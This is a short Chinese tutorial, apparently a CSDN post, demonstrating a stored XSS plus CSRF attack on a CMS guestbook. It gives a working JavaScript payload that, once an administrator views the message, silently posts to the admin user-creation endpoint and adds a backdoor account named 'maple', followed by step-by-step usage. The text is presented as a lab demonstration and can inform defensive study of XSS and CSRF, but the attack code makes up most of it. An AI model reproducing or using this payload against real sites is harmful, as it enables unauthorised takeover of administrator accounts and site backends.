CSDN 漏洞实战
前言
本次将演示在cms
留言板中上传留言,后台管理员看到时就可以生成一个用户,从而登录管理后台
与XSS漏洞相结合
攻击者可以利用 XSS 触发 CSRF 攻击。因为,可以利用 JS 发送 HTTP 请求。经过研究受害网站的业务流程,可以构造如下代码:
1、编写JS 代码
<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://10.4.7.130/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=maple&password=maple&password2=maple&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>
2、留言板上传刚刚编写的JS 代码
3、管理员后台查看留言
之后就会出现一个管理员用户